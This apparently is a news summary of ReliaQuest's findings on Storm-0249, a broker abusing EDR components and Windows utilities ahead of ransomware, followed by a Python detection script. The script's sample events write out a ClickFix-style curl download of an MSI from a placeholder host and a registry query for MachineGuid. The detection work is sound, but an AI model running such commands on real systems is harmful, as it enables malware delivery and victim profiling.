Ransomware IAB abuses EDR for stealthy malware execution www.bleepingcomputer.com/news/secu…
An initial access broker tracked as Storm-0249 is abusing endpoint detection and response (EDR) solutions and trusted Microsoft Windows utilities to load malware, establish command-and-control communications, and maintain persistence in preparation for ransomware attacks. In one attack analyzed by researchers at cybersecurity company ReliaQuest, Storm-0249 leveraged SentinelOne EDR components to hide malicious activity. However, researchers say that the same method works with other EDR products as well.
ReliaQuest says that the Storm-0249 attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic. The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring.
ReliaQuest explains that the compromised systems are profiled using ‘MachineGuid,’ a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use for binding encryption keys to specific victims. This suggests that Storm-0249 conducts initial access compromises tailored to the needs of its typical customers, ransomware affiliates.
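The behaviours described above (a Run-dialog curl download of an MSI, and reg.exe/findstr.exe querying MachineGuid as children of a signed EDR agent process) can be turned into simple process-creation detections. The following is an added example written for this page, not code from ReliaQuest or BleepingComputer; the log records are constructed Sysmon-style events, and the EDR agent path is a placeholder, since the article does not name the exact SentinelOne component.

```python
import re

# Placeholder install directory standing in for any vendor's signed EDR agent (assumption).
EDR_AGENT_DIR = "C:\\Program Files\\EDR-Vendor\\"
# Windows LOLBins the article says were used to collect system identifiers.
LOLBINS = {"reg.exe", "findstr.exe"}

# Constructed process-creation records (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl -o C:\\Users\\Public\\update.msi https://example.invalid/update.msi",
     "parent_image": "C:\\Windows\\explorer.exe"},           # Run dialog -> explorer.exe parent
    {"image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": 'reg query "HKLM\\SOFTWARE\\Microsoft\\Cryptography" /v MachineGuid',
     "parent_image": EDR_AGENT_DIR + "agent.exe"},           # profiling via EDR agent
    {"image": "C:\\Windows\\System32\\findstr.exe",
     "cmdline": "findstr /i MachineGuid",
     "parent_image": EDR_AGENT_DIR + "agent.exe"},
    {"image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": 'reg query "HKLM\\SOFTWARE\\Contoso" /v Version',
     "parent_image": "C:\\Windows\\System32\\cmd.exe"},      # benign admin query
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of the detection rules that one process-creation event triggers."""
    hits = []
    img, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
    # Rule 1: LOLBin reading the MachineGuid value used for victim-specific key binding.
    if img in LOLBINS and "machineguid" in cmd.lower():
        hits.append("machineguid_profiling")
    # Rule 2: an EDR agent process should not be spawning reg.exe or findstr.exe.
    if img in LOLBINS and ev["parent_image"].lower().startswith(EDR_AGENT_DIR.lower()):
        hits.append("lolbin_child_of_edr_agent")
    # Rule 3: ClickFix pattern - curl launched from the Run dialog fetching an MSI package.
    if parent == "explorer.exe" and "curl" in cmd.lower() and re.search(r"\.msi\b", cmd, re.I):
        hits.append("run_dialog_curl_msi")
    return hits


def detect(events):
    """Run every rule over a list of events; returns (process name, rule) pairs in order."""
    return [(basename(ev["image"]), hit) for ev in events for hit in classify(ev)]


if __name__ == "__main__":
    for proc, rule in detect(SAMPLE_EVENTS):
        print(f"{proc}: {rule}")
```

The benign reg.exe query from cmd.exe is left untouched, which is the distinction worth keeping when tuning these rules against real telemetry.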